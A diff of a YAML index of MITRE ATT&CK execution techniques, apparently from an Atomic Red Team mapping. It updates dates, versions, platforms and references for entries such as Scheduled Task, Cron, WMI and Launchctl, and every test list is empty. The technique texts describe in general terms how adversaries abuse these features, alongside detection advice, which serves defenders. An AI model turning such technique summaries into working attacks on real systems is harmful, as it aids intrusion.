         description: Microsoft Threat Intelligence Team & Detection and Response Team
           . (2022, April 12). Tarrask malware uses scheduled tasks for defense evasion.
@@ -24551,6 +24868,10 @@ execution:
         description: Microsoft. (n.d.). General Task Registration. Retrieved December
           12, 2017.
         url: https://technet.microsoft.com/library/dd315590.aspx
+      - source_name: Red Canary - Atomic Red Team
+        description: 'Red Canary - Atomic Red Team. (n.d.). T1053.005 - Scheduled
+          Task/Job: Scheduled Task. Retrieved June 19, 2024.'
+        url: https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.005/T1053.005.md
       - source_name: TechNet Autoruns
         description: Russinovich, M. (2016, January 4). Autoruns for Windows v13.51.
           Retrieved June 6, 2016.
@@ -24563,16 +24884,19 @@ execution:
         description: Sittikorn S. (2022, April 15). Removal Of SD Value to Hide Schedule
           Task - Registry. Retrieved June 1, 2022.
         url: https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml
+      - source_name: Stack Overflow
+        description: Stack Overflow. (n.d.). How to find the location of the Scheduled
+          Tasks folder. Retrieved June 19, 2024.
+        url: https://stackoverflow.com/questions/2913816/how-to-find-the-location-of-the-scheduled-tasks-folder
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.005
     atomic_tests: []
   T1047:
     technique:
-      modified: '2024-04-11T18:13:25.130Z'
+      modified: '2024-10-15T15:20:57.328Z'
       name: Windows Management Instrumentation
       description: |-
         Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.
@@ -24638,7 +24962,6 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1047
     atomic_tests: []
   T1129:
@@ -24715,66 +25038,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1129
     atomic_tests: []
   T1059.007:
     technique:
-      x_mitre_platforms:
-      - Windows
-      - macOS
-      - Linux
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Cody Thomas, SpecterOps
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
-      type: attack-pattern
-      created: '2020-06-23T19:12:24.924Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1059.007
-        url: https://attack.mitre.org/techniques/T1059/007
-      - source_name: NodeJS
-        url: https://nodejs.org/
-        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
-      - source_name: JScrip May 2018
-        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
-        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
-          June 23, 2020.
-      - source_name: Microsoft JScript 2007
-        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
-        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
-          ECMAScript …. Retrieved June 23, 2020.
-      - source_name: Microsoft Windows Scripts
-        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
-        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
-          June 23, 2020.
-      - source_name: Apple About Mac Scripting 2016
-        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
-        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
-          14, 2021.
-      - source_name: SpecterOps JXA 2020
-        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
-        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
-          2021.
-      - source_name: SentinelOne macOS Red Team
-        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
-        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
-          APIs Without Building Binaries. Retrieved July 17, 2020.'
-      - source_name: Red Canary Silver Sparrow Feb2021
-        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
-        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
-          wings: Outing macOS malware before it takes flight. Retrieved April 20,
-          2021.'
-      - source_name: MDSec macOS JXA and VSCode
-        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
-        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
-          with VSCode Extensions. Retrieved April 20, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-07-30T14:12:52.698Z'
       name: 'Command and Scripting Interpreter: JavaScript'
       description: |-
         Adversaries may abuse various implementations of JavaScript for execution. JavaScript (JS) is a platform-independent scripting language (compiled just-in-time at runtime) commonly associated with scripts in webpages, though JS can be executed in runtime environments outside the browser.(Citation: NodeJS)
@@ -24787,31 +25055,83 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_contributors:
+      - Cody Thomas, SpecterOps
+      x_mitre_deprecated: false
       x_mitre_detection: |-
         Monitor for events associated with scripting execution, such as process activity, usage of the Windows Script Host (typically cscript.exe or wscript.exe), file activity involving scripts, or loading of modules associated with scripting languages (ex: JScript.dll). Scripting execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used. Monitor processes and command-line arguments for execution and subsequent behavior. Actions may be related to network and system information [Discovery](https://attack.mitre.org/tactics/TA0007), [Collection](https://attack.mitre.org/tactics/TA0009), or other programmable post-compromise behaviors and could be used as indicators of detection leading back to the source.
 
         Monitor for execution of JXA through <code>osascript</code> and usage of <code>OSAScript</code> API that may be related to other suspicious behavior occurring on the system.
 
         Understanding standard usage patterns is important to avoid a high number of false positives. If scripting is restricted for normal users, then any attempts to enable related components running on a system would be considered suspicious. If scripting is not commonly used on a system, but enabled, execution running out of cycle from patching or other administrator functions is suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '2.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Windows
+      - macOS
+      - Linux
+      x_mitre_version: '2.2'
       x_mitre_data_sources:
       - 'Module: Module Load'
       - 'Process: Process Creation'
       - 'Script: Script Execution'
       - 'Command: Command Execution'
-      x_mitre_permissions_required:
-      - User
-      - Administrator
-      - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d
+      created: '2020-06-23T19:12:24.924Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1059/007
+        external_id: T1059.007
+      - source_name: Apple About Mac Scripting 2016
+        description: Apple. (2016, June 13). About Mac Scripting. Retrieved April
+          14, 2021.
+        url: https://developer.apple.com/library/archive/documentation/LanguagesUtilities/Conceptual/MacAutomationScriptingGuide/index.html
+      - source_name: MDSec macOS JXA and VSCode
+        description: Dominic Chell. (2021, January 1). macOS Post-Exploitation Shenanigans
+          with VSCode Extensions. Retrieved April 20, 2021.
+        url: https://www.mdsec.co.uk/2021/01/macos-post-exploitation-shenanigans-with-vscode-extensions/
+      - source_name: Microsoft JScript 2007
+        description: Microsoft. (2007, August 15). The World of JScript, JavaScript,
+          ECMAScript …. Retrieved June 23, 2020.
+        url: https://docs.microsoft.com/archive/blogs/gauravseth/the-world-of-jscript-javascript-ecmascript
+      - source_name: Microsoft Windows Scripts
+        description: Microsoft. (2017, January 18). Windows Script Interfaces. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/scripting/winscript/windows-script-interfaces
+      - source_name: JScrip May 2018
+        description: Microsoft. (2018, May 31). Translating to JScript. Retrieved
+          June 23, 2020.
+        url: https://docs.microsoft.com/windows/win32/com/translating-to-jscript
+      - source_name: NodeJS
+        description: OpenJS Foundation. (n.d.). Node.js. Retrieved June 23, 2020.
+        url: https://nodejs.org/
+      - source_name: SentinelOne macOS Red Team
+        description: 'Phil Stokes. (2019, December 5). macOS Red Team: Calling Apple
+          APIs Without Building Binaries. Retrieved July 17, 2020.'
+        url: https://www.sentinelone.com/blog/macos-red-team-calling-apple-apis-without-building-binaries/
+      - source_name: SpecterOps JXA 2020
+        description: Pitt, L. (2020, August 6). Persistent JXA. Retrieved April 14,
+          2021.
+        url: https://posts.specterops.io/persistent-jxa-66e1c3cd1cf5
+      - source_name: Red Canary Silver Sparrow Feb2021
+        description: 'Tony Lambert. (2021, February 18). Clipping Silver Sparrow’s
+          wings: Outing macOS malware before it takes flight. Retrieved April 20,
+          2021.'
+        url: https://redcanary.com/blog/clipping-silver-sparrows-wings/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1059.007
     atomic_tests: []
   T1053.007:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:26:03.731Z'
       name: Kubernetes Cronjob
       description: |-
         Adversaries may abuse task scheduling functionality provided by container orchestration tools such as Kubernetes to schedule deployment of containers configured to execute malicious code. Container orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux system. Deployments of this type can also be configured to maintain a quantity of containers over time, automating the process of maintaining persistence within a cluster.
@@ -24869,9 +25189,8 @@ execution:
         url: https://www.microsoft.com/security/blog/2020/04/02/attack-matrix-kubernetes/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1053.007
     atomic_tests: []
   T1559.002:
@@ -24963,20 +25282,19 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1559.002
     atomic_tests: []
   T1204.002:
     technique:
-      modified: '2023-04-21T12:22:19.740Z'
+      modified: '2024-09-25T20:50:34.876Z'
       name: 'User Execution: Malicious File'
       description: "An adversary may rely upon a user opening a malicious file in
         order to gain execution. Users may be subjected to social engineering to get
         them to open a file that will lead to code execution. This user action will
         typically be observed as follow-on behavior from [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001).
         Adversaries may use several types of files that require a user to execute
-        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, and .cpl.\n\nAdversaries
-        may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
+        them, including .doc, .pdf, .xls, .rtf, .scr, .exe, .lnk, .pif, .cpl, and
+        .reg.\n\nAdversaries may employ various forms of [Masquerading](https://attack.mitre.org/techniques/T1036)
         and [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027)
         to increase the likelihood that a user will open and successfully execute
         a malicious file. These methods may include using a familiar naming convention
@@ -25004,7 +25322,7 @@ execution:
       - Linux
       - macOS
       - Windows
-      x_mitre_version: '1.3'
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'File: File Creation'
@@ -25024,33 +25342,13 @@ execution:
         url: https://www.bleepingcomputer.com/news/security/psa-dont-open-spam-containing-password-protected-word-docs/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1204.002
     atomic_tests: []
   T1053.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
-      type: attack-pattern
-      created: '2019-12-03T14:25:00.538Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1053.003
-        url: https://attack.mitre.org/techniques/T1053/003
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-10-15T18:45:51.945Z'
       name: 'Scheduled Task/Job: Cron'
       description: "Adversaries may abuse the <code>cron</code> utility to perform
         task scheduling for initial or recurring execution of malicious code.(Citation:
@@ -25067,6 +25365,7 @@ execution:
         phase_name: persistence
       - kill_chain_name: mitre-attack
         phase_name: privilege-escalation
+      x_mitre_deprecated: false
       x_mitre_detection: "Monitor scheduled task creation from common utilities using
         command-line invocation. Legitimate scheduled tasks may be created during
         installation of new software or through system administration functions. Look
@@ -25077,9 +25376,13 @@ execution:
         part of a chain of behavior that could lead to other activities, such as network
         connections made for Command and Control, learning details about the environment
         through Discovery, and Lateral Movement. "
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Process: Process Creation'
@@ -25087,8 +25390,24 @@ execution:
       - 'Command: Command Execution'
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+      created: '2019-12-03T14:25:00.538Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1053/003
+        external_id: T1053.003
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1053.003
     atomic_tests: []
   T1559.001:
@@ -25128,7 +25447,7 @@ execution:
         description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
           Application COM Object. Retrieved November 21, 2017.
         source_name: Enigma MMC20 COM Jan 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-07-26T22:51:20.448Z'
       name: Component Object Model
       description: |-
         Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as  [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
@@ -25153,12 +25472,10 @@ execution:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
       x_mitre_remote_support: true
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1053:
     technique:
-      modified: '2024-03-01T15:29:46.832Z'
+      modified: '2024-10-15T15:14:03.453Z'
       name: Scheduled Task/Job
       description: |-
         Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25238,11 +25555,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.002:
     technique:
-      modified: '2024-03-01T19:06:05.126Z'
+      modified: '2024-10-15T14:18:20.087Z'
       name: 'Command and Scripting Interpreter: AppleScript'
       description: |-
         Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25302,12 +25618,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059.002
     atomic_tests: []
   T1106:
     technique:
-      modified: '2023-10-13T16:01:07.538Z'
+      modified: '2024-09-12T15:25:57.058Z'
       name: Native API
       description: |-
         Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25405,9 +25720,9 @@ execution:
           2021.
         url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
       - source_name: Microsoft CreateProcess
-        description: Microsoft. (n.d.). CreateProcess function. Retrieved December
-          5, 2014.
-        url: http://msdn.microsoft.com/en-us/library/ms682425
+        description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+          12, 2024.
+        url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
       - source_name: Microsoft Win32
         description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
           March 15, 2020.
@@ -25424,19 +25739,18 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1106
     atomic_tests: []
   T1059.010:
     technique:
-      modified: '2024-04-10T16:05:22.456Z'
+      modified: '2024-04-28T15:58:48.119Z'
       name: AutoHotKey & AutoIT
       description: |-
         Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
 
         Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
 
-        These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+        These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
@@ -25445,7 +25759,7 @@ execution:
       - Liran Ravich, CardinalOps
       - Serhii Melnyk, Trustwave SpiderLabs
       - Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
-      - Monty
+      - "@_montysecurity"
       x_mitre_deprecated: false
       x_mitre_detection: ''
       x_mitre_domains:
@@ -25482,11 +25796,10 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1059.009:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:44:20.143Z'
       name: Cloud API
       description: "Adversaries may abuse cloud APIs to execute malicious commands.
         APIs available in cloud environments provide various functionalities and are
@@ -25523,11 +25836,10 @@ execution:
       x_mitre_is_subtechnique: true
       x_mitre_platforms:
       - IaaS
-      - Azure AD
-      - Office 365
       - SaaS
-      - Google Workspace
-      x_mitre_version: '1.0'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
       - 'Command: Command Execution'
       x_mitre_remote_support: false
@@ -25546,13 +25858,12 @@ execution:
         url: https://github.com/Azure/azure-powershell
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1610:
     technique:
-      modified: '2024-04-11T21:24:42.680Z'
+      modified: '2024-10-15T15:06:17.124Z'
       name: Deploy a container
       description: |-
         Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25631,12 +25942,11 @@ execution:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1610
     atomic_tests: []
   T1059:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Command and Scripting Interpreter
       description: |-
         Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25647,6 +25957,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25657,16 +25968,16 @@ execution:
       x_mitre_domains:
       - enterprise-attack
       x_mitre_is_subtechnique: false
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_platforms:
       - Linux
       - macOS
       - Windows
       - Network
-      - Office 365
-      - Azure AD
       - IaaS
-      - Google Workspace
-      x_mitre_version: '2.4'
+      - Office Suite
+      - Identity Provider
+      x_mitre_version: '2.5'
       x_mitre_data_sources:
       - 'Script: Script Execution'
       - 'Process: Process Creation'
@@ -25697,14 +26008,11 @@ execution:
         url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1059
     atomic_tests: []
   T1609:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T16:25:45.507Z'
       name: Kubernetes Exec Into Container
       description: |-
         Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
@@ -25770,39 +26078,13 @@ execution:
         url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1609
     atomic_tests: []
   T1569.001:
     technique:
-      x_mitre_platforms:
-      - macOS
-      x_mitre_domains:
-      - enterprise-attack
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
-      type: attack-pattern
-      created: '2020-03-10T18:26:56.187Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1569.001
-        url: https://attack.mitre.org/techniques/T1569/001
-      - source_name: Launchctl Man
-        url: https://ss64.com/osx/launchctl.html
-        description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
-      - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
-        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
-          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
-        source_name: Sofacy Komplex Trojan
-      - source_name: 20 macOS Common Tools and Techniques
-        url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
-        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
-          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2024-09-20T20:14:35.179Z'
       name: 'System Services: Launchctl'
       description: |
         Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25811,6 +26093,7 @@ execution:
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: execution
+      x_mitre_deprecated: false
       x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
         plist file on disk which can be monitored. Monitor for recently modified or
         created plist files with a significant change to the executable path executed
@@ -25823,19 +26106,42 @@ execution:
         are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
         or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
         the services are unloaded prior to deleting plist files."
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.1'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - macOS
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Process: Process Creation'
       - 'Command: Command Execution'
       - 'Service: Service Creation'
       - 'File: File Modification'
-      x_mitre_permissions_required:
-      - User
-      - root
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      x_mitre_remote_support: false
+      type: attack-pattern
+      id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+      created: '2020-03-10T18:26:56.187Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1569/001
+        external_id: T1569.001
+      - source_name: Sofacy Komplex Trojan
+        description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+          Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+        url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+      - source_name: 20 macOS Common Tools and Techniques
+        description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+          Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
